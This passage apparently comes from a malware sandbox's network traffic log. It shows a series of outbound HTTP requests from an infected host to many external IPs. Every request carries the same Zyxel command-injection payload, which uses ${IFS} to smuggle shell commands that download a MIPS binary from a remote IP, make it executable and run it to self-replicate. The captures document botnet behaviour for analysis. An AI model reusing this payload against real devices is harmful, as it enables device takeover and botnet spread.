                                                Jan 29, 2024 07:07:36.072269917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1372192.168.2.235904075.178.238.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072309017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1373192.168.2.2342594154.248.76.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072346926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1374192.168.2.234455414.12.12.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072406054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1375192.168.2.2333706182.111.119.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072438002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1376192.168.2.2338884130.6.10.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072472095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1377192.168.2.233310465.204.73.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072515965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1378192.168.2.2339622158.224.165.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072551966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1379192.168.2.2347656129.75.142.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072612047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1380192.168.2.2355358179.234.121.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072638035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1381192.168.2.2339286129.59.92.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072683096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1382192.168.2.2356596107.140.7.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072714090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1383192.168.2.235885463.206.234.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072766066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1384192.168.2.2334330110.114.178.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072808027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1385192.168.2.2358208156.242.177.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072840929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1386192.168.2.234861083.191.155.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072887897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1387192.168.2.2348810172.124.16.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072916985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1388192.168.2.2342104153.121.107.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.072959900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1389192.168.2.2359976188.110.170.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073034048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1390192.168.2.234517489.186.125.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073082924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1391192.168.2.2333938185.118.121.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073106050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1392192.168.2.2338998193.42.147.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073168993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1393192.168.2.2353526186.116.97.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073195934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1394192.168.2.234264482.15.134.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073234081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1395192.168.2.233659242.68.140.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073267937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1396192.168.2.235689844.240.181.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073302984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1397192.168.2.2355550140.53.148.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073364019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1398192.168.2.2348762211.252.148.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073388100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1399192.168.2.234343051.70.124.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073435068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1400192.168.2.235210673.65.233.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073457003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1401192.168.2.2349244186.136.250.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073493004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1402192.168.2.2339542174.109.146.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073546886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1403192.168.2.2339064175.155.244.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073581934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1404192.168.2.2354778211.57.26.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073632002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1405192.168.2.233793084.212.142.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073651075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1406192.168.2.23568681.143.33.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073705912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1407192.168.2.2354088195.23.127.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073762894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1408192.168.2.235154864.157.230.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073796034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1409192.168.2.2360582160.247.141.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073843956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1410192.168.2.233919084.224.45.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073892117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1411192.168.2.2354050180.86.111.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073939085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1412192.168.2.2357660197.165.203.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073965073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1413192.168.2.235056497.10.255.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.073993921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1414192.168.2.23570045.234.50.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074026108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1415192.168.2.2351662188.210.153.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074059963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1416192.168.2.2357174128.160.237.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074110985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1417192.168.2.2346492148.171.94.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074171066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1418192.168.2.2355718167.221.150.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074191093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1419192.168.2.2360380116.153.137.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074232101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1420192.168.2.234600268.0.160.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074284077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1421192.168.2.234089298.36.91.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074314117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1422192.168.2.2336504182.238.105.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074337959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1423192.168.2.2340056166.14.155.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074378967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1424192.168.2.2347394168.46.211.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074408054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1425192.168.2.235931693.179.64.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074466944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1426192.168.2.2347864209.218.245.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074490070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1427192.168.2.235454460.61.101.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074543953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1428192.168.2.235031683.79.49.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074599028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1429192.168.2.23420989.76.97.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074624062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1430192.168.2.2345634141.247.54.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074656010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1431192.168.2.233978275.250.0.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074700117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1432192.168.2.2348454124.182.195.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074754953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1433192.168.2.233629286.57.231.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074800968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1434192.168.2.2347352179.171.225.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:36.074843884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1435192.168.2.2343664107.176.165.113443
                                                TimestampBytes transferredDirectionData
